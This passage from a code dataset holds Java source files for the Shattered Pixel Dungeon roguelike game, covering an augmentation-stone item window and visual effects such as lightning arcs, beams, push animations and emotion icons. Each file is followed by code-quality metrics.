"qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/stones/StoneOfAugmentation.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.stones;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.Armor;
import com.shatteredpixel.shatteredpixeldungeon.items.scrolls.ScrollOfUpgrade;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.Weapon;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.scenes.PixelScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.RedButton;
import com.shatteredpixel.shatteredpixeldungeon.ui.RenderedTextBlock;
import com.shatteredpixel.shatteredpixeldungeon.ui.Window;
import com.shatteredpixel.shatteredpixeldungeon.windows.IconTitle;
import com.shatteredpixel.shatteredpixeldungeon.windows.WndBag;
public class StoneOfAugmentation extends InventoryStone {
{
mode = WndBag.Mode.ENCHANTABLE;
image = ItemSpriteSheet.STONE_AUGMENTATION;
}
@Override
protected void onItemSelected(Item item) {
GameScene.show(new WndAugment( item));
}
public void apply( Weapon weapon, Weapon.Augment augment ) {
weapon.augment = augment;
useAnimation();
ScrollOfUpgrade.upgrade(curUser);
}
public void apply( Armor armor, Armor.Augment augment ) {
armor.augment = augment;
useAnimation();
ScrollOfUpgrade.upgrade(curUser);
}
@Override
public int price() {
return 30 * quantity;
}
public class WndAugment extends Window {
private static final int WIDTH = 120;
private static final int MARGIN = 2;
private static final int BUTTON_WIDTH = WIDTH - MARGIN * 2;
private static final int BUTTON_HEIGHT = 20;
public WndAugment( final Item toAugment ) {
super();
IconTitle titlebar = new IconTitle( toAugment );
titlebar.setRect( 0, 0, WIDTH, 0 );
add( titlebar );
RenderedTextBlock tfMesage = PixelScene.renderTextBlock( Messages.get(this, "choice"), 8 );
tfMesage.maxWidth(WIDTH - MARGIN * 2);
tfMesage.setPos(MARGIN, titlebar.bottom() + MARGIN);
add( tfMesage );
float pos = tfMesage.top() + tfMesage.height();
if (toAugment instanceof Weapon){
for (final Weapon.Augment aug : Weapon.Augment.values()){
if (((Weapon) toAugment).augment != aug){
RedButton btnSpeed = new RedButton( Messages.get(this, aug.name()) ) {
@Override
protected void onClick() {
hide();
StoneOfAugmentation.this.apply( (Weapon)toAugment, aug );
}
};
btnSpeed.setRect( MARGIN, pos + MARGIN, BUTTON_WIDTH, BUTTON_HEIGHT );
add( btnSpeed );
pos = btnSpeed.bottom();
}
}
} else if (toAugment instanceof Armor){
for (final Armor.Augment aug : Armor.Augment.values()){
if (((Armor) toAugment).augment != aug){
RedButton btnSpeed = new RedButton( Messages.get(this, aug.name()) ) {
@Override
protected void onClick() {
hide();
StoneOfAugmentation.this.apply( (Armor) toAugment, aug );
}
};
btnSpeed.setRect( MARGIN, pos + MARGIN, BUTTON_WIDTH, BUTTON_HEIGHT );
add( btnSpeed );
pos = btnSpeed.bottom();
}
}
}
RedButton btnCancel = new RedButton( Messages.get(this, "cancel") ) {
@Override
protected void onClick() {
hide();
StoneOfAugmentation.this.collect();
}
};
btnCancel.setRect( MARGIN, pos + MARGIN, BUTTON_WIDTH, BUTTON_HEIGHT );
add( btnCancel );
resize( WIDTH, (int)btnCancel.bottom() + MARGIN );
}
@Override
public void onBackPressed() {
StoneOfAugmentation.this.collect();
super.onBackPressed();
}
}
}
| 4,556 | StoneOfAugmentation | java | en | java | code | {"qsc_code_num_words": 494, "qsc_code_num_chars": 4556.0, "qsc_code_mean_word_length": 6.50809717, "qsc_code_frac_words_unique": 0.34210526, "qsc_code_frac_chars_top_2grams": 0.07402799, "qsc_code_frac_chars_top_3grams": 0.16547434, "qsc_code_frac_chars_top_4grams": 0.17791602, "qsc_code_frac_chars_dupe_5grams": 0.42674961, "qsc_code_frac_chars_dupe_6grams": 0.24354588, "qsc_code_frac_chars_dupe_7grams": 0.19191291, "qsc_code_frac_chars_dupe_8grams": 0.15365474, "qsc_code_frac_chars_dupe_9grams": 0.15365474, "qsc_code_frac_chars_dupe_10grams": 0.13872473, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00842391, "qsc_code_frac_chars_whitespace": 0.19227392, "qsc_code_size_file_byte": 4556.0, "qsc_code_num_lines": 147.0, "qsc_code_num_chars_line_max": 95.0, "qsc_code_num_chars_line_mean": 30.99319728, "qsc_code_frac_chars_alphabet": 0.86521739, "qsc_code_frac_chars_comments": 0.17120281, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.28712871, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00317797, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07920792, "qsc_codejava_score_lines_no_logic": 0.22772277, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Lightning.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.watabou.glwrap.Blending;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.Image;
import com.watabou.utils.Callback;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
import java.util.Arrays;
import java.util.List;
public class Lightning extends Group {
private static final float DURATION = 0.3f;
private float life;
private List<Arc> arcs;
private Callback callback;
public Lightning(int from, int to, Callback callback){
this(Arrays.asList(new Arc(from, to)), callback);
}
public Lightning(PointF from, int to, Callback callback){
this(Arrays.asList(new Arc(from, to)), callback);
}
public Lightning(int from, PointF to, Callback callback){
this(Arrays.asList(new Arc(from, to)), callback);
}
public Lightning(PointF from, PointF to, Callback callback){
this(Arrays.asList(new Arc(from, to)), callback);
}
public Lightning( List<Arc> arcs, Callback callback ) {
super();
this.arcs = arcs;
for (Arc arc : this.arcs)
add(arc);
this.callback = callback;
life = DURATION;
}
private static final double A = 180 / Math.PI;
@Override
public void update() {
if ((life -= Game.elapsed) < 0) {
killAndErase();
if (callback != null) {
callback.call();
}
} else {
float alpha = life / DURATION;
for (Arc arc : arcs) {
arc.alpha(alpha);
}
super.update();
}
}
@Override
public void draw() {
Blending.setLightMode();
super.draw();
Blending.setNormalMode();
}
//A lightning object is meant to be loaded up with arcs.
//these act as a means of easily expressing lighting between two points.
public static class Arc extends Group {
private Image arc1, arc2;
//starting and ending x/y values
private PointF start, end;
public Arc(int from, int to){
this( DungeonTilemap.tileCenterToWorld(from),
DungeonTilemap.tileCenterToWorld(to));
}
public Arc(PointF from, int to){
this( from, DungeonTilemap.tileCenterToWorld(to));
}
public Arc(int from, PointF to){
this( DungeonTilemap.tileCenterToWorld(from), to);
}
public Arc(PointF from, PointF to){
start = from;
end = to;
arc1 = new Image(Effects.get(Effects.Type.LIGHTNING));
arc1.x = start.x - arc1.origin.x;
arc1.y = start.y - arc1.origin.y;
arc1.origin.set( 0, arc1.height()/2 );
add( arc1 );
arc2 = new Image(Effects.get(Effects.Type.LIGHTNING));
arc2.origin.set( 0, arc2.height()/2 );
add( arc2 );
}
public void alpha(float alpha) {
arc1.am = arc2.am = alpha;
}
@Override
public void update() {
float x2 = (start.x + end.x) / 2 + Random.Float( -4, +4 );
float y2 = (start.y + end.y) / 2 + Random.Float( -4, +4 );
float dx = x2 - start.x;
float dy = y2 - start.y;
arc1.angle = (float)(Math.atan2( dy, dx ) * A);
arc1.scale.x = (float)Math.sqrt( dx * dx + dy * dy ) / arc1.width;
dx = end.x - x2;
dy = end.y - y2;
arc2.angle = (float)(Math.atan2( dy, dx ) * A);
arc2.scale.x = (float)Math.sqrt( dx * dx + dy * dy ) / arc2.width;
arc2.x = x2 - arc2.origin.x;
arc2.y = y2 - arc2.origin.x;
}
}
}
| 4,040 | Lightning | java | en | java | code | {"qsc_code_num_words": 573, "qsc_code_num_chars": 4040.0, "qsc_code_mean_word_length": 4.77137871, "qsc_code_frac_words_unique": 0.30890052, "qsc_code_frac_chars_top_2grams": 0.02633504, "qsc_code_frac_chars_top_3grams": 0.04096562, "qsc_code_frac_chars_top_4grams": 0.03218727, "qsc_code_frac_chars_dupe_5grams": 0.31089978, "qsc_code_frac_chars_dupe_6grams": 0.25091441, "qsc_code_frac_chars_dupe_7grams": 0.18288222, "qsc_code_frac_chars_dupe_8grams": 0.13752743, "qsc_code_frac_chars_dupe_9grams": 0.13752743, "qsc_code_frac_chars_dupe_10grams": 0.11777615, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02130945, "qsc_code_frac_chars_whitespace": 0.19851485, "qsc_code_size_file_byte": 4040.0, "qsc_code_num_lines": 162.0, "qsc_code_num_chars_line_max": 74.0, "qsc_code_num_chars_line_mean": 24.9382716, "qsc_code_frac_chars_alphabet": 0.82303891, "qsc_code_frac_chars_comments": 0.23292079, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08737864, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.03883495, "qsc_codejava_score_lines_no_logic": 0.17475728, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Beam.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.watabou.glwrap.Blending;
import com.watabou.noosa.Game;
import com.watabou.noosa.Image;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.PointF;
public class Beam extends Image {
private static final double A = 180 / Math.PI;
private float duration;
private float timeLeft;
private Beam(PointF s, PointF e, Effects.Type asset, float duration) {
super( Effects.get( asset ) );
origin.set( 0, height / 2 );
x = s.x - origin.x;
y = s.y - origin.y;
float dx = e.x - s.x;
float dy = e.y - s.y;
angle = (float)(Math.atan2( dy, dx ) * A);
scale.x = (float)Math.sqrt( dx * dx + dy * dy ) / width;
Sample.INSTANCE.play( Assets.SND_RAY );
timeLeft = this.duration = duration;
}
public static class DeathRay extends Beam{
public DeathRay(PointF s, PointF e){
super(s, e, Effects.Type.DEATH_RAY, 0.5f);
}
}
public static class LightRay extends Beam{
public LightRay(PointF s, PointF e){
super(s, e, Effects.Type.LIGHT_RAY, 1f);
}
}
public static class HealthRay extends Beam{
public HealthRay(PointF s, PointF e){
super(s, e, Effects.Type.HEALTH_RAY, 0.75f);
}
}
@Override
public void update() {
super.update();
float p = timeLeft / duration;
alpha( p );
scale.set( scale.x, p );
if ((timeLeft -= Game.elapsed) <= 0) {
killAndErase();
}
}
@Override
public void draw() {
Blending.setLightMode();
super.draw();
Blending.setNormalMode();
}
}
| 2,366 | Beam | java | en | java | code | {"qsc_code_num_words": 340, "qsc_code_num_chars": 2366.0, "qsc_code_mean_word_length": 4.8, "qsc_code_frac_words_unique": 0.44411765, "qsc_code_frac_chars_top_2grams": 0.03308824, "qsc_code_frac_chars_top_3grams": 0.04901961, "qsc_code_frac_chars_top_4grams": 0.03431373, "qsc_code_frac_chars_dupe_5grams": 0.10906863, "qsc_code_frac_chars_dupe_6grams": 0.09313725, "qsc_code_frac_chars_dupe_7grams": 0.05882353, "qsc_code_frac_chars_dupe_8grams": 0.05882353, "qsc_code_frac_chars_dupe_9grams": 0.05882353, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01583113, "qsc_code_frac_chars_whitespace": 0.19907016, "qsc_code_size_file_byte": 2366.0, "qsc_code_num_lines": 93.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 25.44086022, "qsc_code_frac_chars_alphabet": 0.84538259, "qsc_code_frac_chars_comments": 0.33009298, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.03636364, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.03636364, "qsc_codejava_score_lines_no_logic": 0.2, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Pushing.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.watabou.noosa.Game;
import com.watabou.noosa.Visual;
import com.watabou.utils.Callback;
import com.watabou.utils.PointF;
public class Pushing extends Actor {
private CharSprite sprite;
private int from;
private int to;
private Effect effect;
private Callback callback;
{
actPriority = VFX_PRIO;
}
public Pushing( Char ch, int from, int to ) {
sprite = ch.sprite;
this.from = from;
this.to = to;
this.callback = null;
}
public Pushing( Char ch, int from, int to, Callback callback ) {
this(ch, from, to);
this.callback = callback;
}
@Override
protected boolean act() {
if (sprite != null) {
if (effect == null) {
new Effect();
}
}
Actor.remove( Pushing.this );
//so that all pushing effects at the same time go simultaneously
for ( Actor actor : Actor.all() ){
if (actor instanceof Pushing && actor.cooldown() == 0)
return true;
}
return false;
}
public class Effect extends Visual {
private static final float DELAY = 0.15f;
private PointF end;
private float delay;
public Effect() {
super( 0, 0, 0, 0 );
point( sprite.worldToCamera( from ) );
end = sprite.worldToCamera( to );
speed.set( 2 * (end.x - x) / DELAY, 2 * (end.y - y) / DELAY );
acc.set( -speed.x / DELAY, -speed.y / DELAY );
delay = 0;
if (sprite.parent != null)
sprite.parent.add( this );
}
@Override
public void update() {
super.update();
if ((delay += Game.elapsed) < DELAY) {
sprite.x = x;
sprite.y = y;
} else {
sprite.point(end);
killAndErase();
Actor.remove(Pushing.this);
if (callback != null) callback.call();
next();
}
}
}
}
| 2,758 | Pushing | java | en | java | code | {"qsc_code_num_words": 362, "qsc_code_num_chars": 2758.0, "qsc_code_mean_word_length": 5.09392265, "qsc_code_frac_words_unique": 0.4198895, "qsc_code_frac_chars_top_2grams": 0.03416486, "qsc_code_frac_chars_top_3grams": 0.0824295, "qsc_code_frac_chars_top_4grams": 0.03091106, "qsc_code_frac_chars_dupe_5grams": 0.13232104, "qsc_code_frac_chars_dupe_6grams": 0.06399132, "qsc_code_frac_chars_dupe_7grams": 0.03362256, "qsc_code_frac_chars_dupe_8grams": 0.03362256, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01309635, "qsc_code_frac_chars_whitespace": 0.22480058, "qsc_code_size_file_byte": 2758.0, "qsc_code_num_lines": 122.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 22.60655738, "qsc_code_frac_chars_alphabet": 0.84939196, "qsc_code_frac_chars_comments": 0.30638144, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.05633803, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.04225352, "qsc_codejava_score_lines_no_logic": 0.29577465, "qsc_codejava_frac_words_no_modifier": 0.4, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/EmoIcon.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.shatteredpixel.shatteredpixeldungeon.ui.Icons;
import com.watabou.noosa.Game;
import com.watabou.noosa.Image;
import com.watabou.utils.Random;
public class EmoIcon extends Image {
protected float maxSize = 2;
protected float timeScale = 1;
protected boolean growing = true;
protected CharSprite owner;
public EmoIcon( CharSprite owner ) {
super();
this.owner = owner;
GameScene.add( this );
}
@Override
public void update() {
super.update();
if (visible) {
if (growing) {
scale.set( Math.min(scale.x + Game.elapsed * timeScale, maxSize ));
if (scale.x >= maxSize) {
growing = false;
}
} else {
scale.set( Math.max(scale.x - Game.elapsed * timeScale, 1f ));
if (scale.x <= 1) {
growing = true;
}
}
x = owner.x + owner.width - width / 2;
y = owner.y - height;
}
}
public static class Sleep extends EmoIcon {
public Sleep( CharSprite owner ) {
super( owner );
copy( Icons.get( Icons.SLEEP ) );
maxSize = 1.2f;
timeScale = 0.5f;
origin.set( width / 2, height / 2 );
scale.set( Random.Float( 1, maxSize ) );
x = owner.x + owner.width - width / 2;
y = owner.y - height;
}
}
public static class Alert extends EmoIcon {
public Alert( CharSprite owner ) {
super( owner );
copy( Icons.get( Icons.ALERT ) );
maxSize = 1.3f;
timeScale = 2;
origin.set( 2.5f, height - 2.5f );
scale.set( Random.Float( 1, maxSize ) );
x = owner.x + owner.width - width / 2;
y = owner.y - height;
}
}
public static class Lost extends EmoIcon {
public Lost( CharSprite owner ){
super( owner );
copy( Icons.get( Icons.LOST ) );
maxSize = 1.25f;
timeScale = 1;
origin.set( 2.5f, height - 2.5f );
scale.set( Random.Float( 1, maxSize ) );
x = owner.x + owner.width - width / 2;
y = owner.y - height;
}
}
}
| 2,904 | EmoIcon | java | en | java | code | {"qsc_code_num_words": 382, "qsc_code_num_chars": 2904.0, "qsc_code_mean_word_length": 4.95549738, "qsc_code_frac_words_unique": 0.36387435, "qsc_code_frac_chars_top_2grams": 0.02535658, "qsc_code_frac_chars_top_3grams": 0.08029583, "qsc_code_frac_chars_top_4grams": 0.02535658, "qsc_code_frac_chars_dupe_5grams": 0.30533545, "qsc_code_frac_chars_dupe_6grams": 0.26413101, "qsc_code_frac_chars_dupe_7grams": 0.23454834, "qsc_code_frac_chars_dupe_8grams": 0.23454834, "qsc_code_frac_chars_dupe_9grams": 0.16798732, "qsc_code_frac_chars_dupe_10grams": 0.16798732, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02214189, "qsc_code_frac_chars_whitespace": 0.23794766, "qsc_code_size_file_byte": 2904.0, "qsc_code_num_lines": 125.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 23.232, "qsc_code_frac_chars_alphabet": 0.83325802, "qsc_code_frac_chars_comments": 0.26893939, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.21917808, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, 